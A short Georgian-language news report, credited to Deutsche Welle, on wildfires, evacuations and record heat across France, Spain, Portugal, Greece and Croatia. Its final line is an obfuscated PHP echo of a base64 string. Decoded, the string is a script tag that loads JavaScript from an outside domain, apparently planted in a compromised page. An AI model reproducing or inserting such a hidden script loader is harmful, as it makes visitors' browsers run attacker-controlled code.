celsiusi
ავერსი შნაიდერი
საფრანგეთში, ესპანეთში, პორტუგალიაში, საბერძნეთსა და ხორვატიაში ტყის ხანძრების გამო ათასობით ადამიანის ევაკუაცია განხორციელდა. ინფორმაციას „დოიჩე ველე“ ავრცელებს.
 
საფრანგეთის სამხრეთ-დასავლეთში, ქალაქ ბორდოს სამხრეთით ექვსი დღეა, ფიჭვის ტყეში ორი უზარმაზარი ხანძარი მძვინვარებს. ხანძრის გამო 14 000 ადამიანის ევაკუაცია გახდა საჭირო.
 
„მეტეო ფრანსის“ ინფორმაციით, საფრანგეთის სამხრეთ ნაწილში ჰაერის ტემპერატურა 41 გრადუსამდე გაიზარდა, ასევე 35 გრადუსამდე ქვეყნის ჩრდილო-დასავლეთში, 18 ივლისს კი მოსალოდნელია სიცხის ახალი რეკორდები. ხანძრის სეზონი დადგა უჩვეულოდ მშრალი, ცხელი გაზაფხულის შემდეგ, რომელმაც ნიადაგი გამოაშრო. ხელისუფლება აღნიშნულს კლიმატის ცვლილებას უკავშირებს.
 
საფრანგეთმა კიდევ 22 რეგიონული დეპარტამენტი – ძირითადად ატლანტის სანაპიროს გასწვრივ – მაღალი ნარინჯისფერი განგაშის რეჟიმში დააწესა.
 
ესპანეთში ჰაერის ტემპერატურამ 45 გრადუსს გადააჭარბა. მაღალი ტემპერატურის გამო ქვეყანაში 360 ადამიანი დაიღუპა.
 
კრეტაზე ბერძენი მეხანძრეები ებრძვიან დიდ ცეცხლს რეთიმნოს გარშემო, ჩრდილოეთ სანაპიროზე მდებარე ბორცვებზე.
 
პორტუგალიაში ხანძარმა წელს 30 000 ჰექტარი გაანადგურა, ძირითადად ქვეყნის ჩრდილოეთით.
468
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");